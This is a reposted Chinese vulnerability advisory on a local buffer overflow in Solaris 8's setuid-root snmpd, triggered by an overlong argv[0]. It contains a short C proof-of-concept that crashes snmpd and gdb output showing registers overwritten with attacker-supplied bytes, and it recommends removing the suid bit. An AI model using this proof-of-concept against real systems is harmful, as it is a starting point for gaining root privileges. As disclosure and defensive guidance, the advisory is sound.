Solaris 8 snmpd 缓冲区溢出漏洞

2008-04-09 04:35:25来源：互联网阅读 ()

Solaris 8 snmpd 缓冲区溢出漏洞

发布日期：2001-03-15
更新日期：2001-03-15

受影响系统：

Sun Solaris 8

描述：

Solaris 8所带的snmpd程序存在一个本地缓冲区溢出漏洞。它是一个SNMP代理，
缺省安装路径是/opt/SUNWssp/snmpd。当它将自己的名字(argv[0])拷贝到一个
内部缓冲区时没有检查数据长度，因而可能发生缓冲区溢出。

此程序缺省设置了suid root属性，因此可能被用来获取root权限。

<*来源：Pablo Sor (psor@afip.gov.ar) *>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Pablo Sor (psor@afip.gov.ar)提供了下列测试代码：

-----------------------------------------------------

#include <stdio.h>

void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
}

-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

$ ./snmpd-demo 700
Segmentation Fault (core dumped)

$ gdb ./snmpd-demo --core=core

[..]

Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0 0x0 0
g1 0x78000 491520
g2 0xff22579c -14526564
g3 0xff162d78 -15323784
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x76f98 487320
o0 0x2c1 705
o1 0xffbed9b9 -4269639
o2 0x2c1 705
o3 0x41 65
o4 0xffbed180 -4271744
o5 0xff26a147 -14245561
sp 0xffbed658 -4270504
o7 0xfee83650 -18336176
l0 0x7efefeff 2130640639
l1 0x81010100 -2130640640
l2 0xff000000 -16777216
l3 0xff0000 16711680
l4 0xff00 65280
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x41414141 1094795585 ;;;;;
i1 0xffbed6fc -4270340 ; pointer to argv[0]
i2 0x41414141 1094795585 ;;;;;
i3 0x41414141 1094795585 ;;;;;
i4 0x81010100 -2130640640
i5 0xff00 65280
fp 0xffbed698 -4270440
i7 0xff265474 -14265228
y 0x6 6
psr 0xfe001000 -33550336
wim 0x0 0
tbr 0x0 0
pc 0xfee32b58 -18666664
npc 0xfee32b5c -18666660
fpsr 0x0 0
cpsr 0x0 0

(gdb) x/20x $i1
0xffbed6fc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed70c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed71c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed72c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbed73c: 0x41414141 0x41414141 0x41414141 0x41414141

建议：

临时解决方法：

NSFOCUS建议您暂时去掉snmpd的suid属性

厂商补丁：

暂无。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有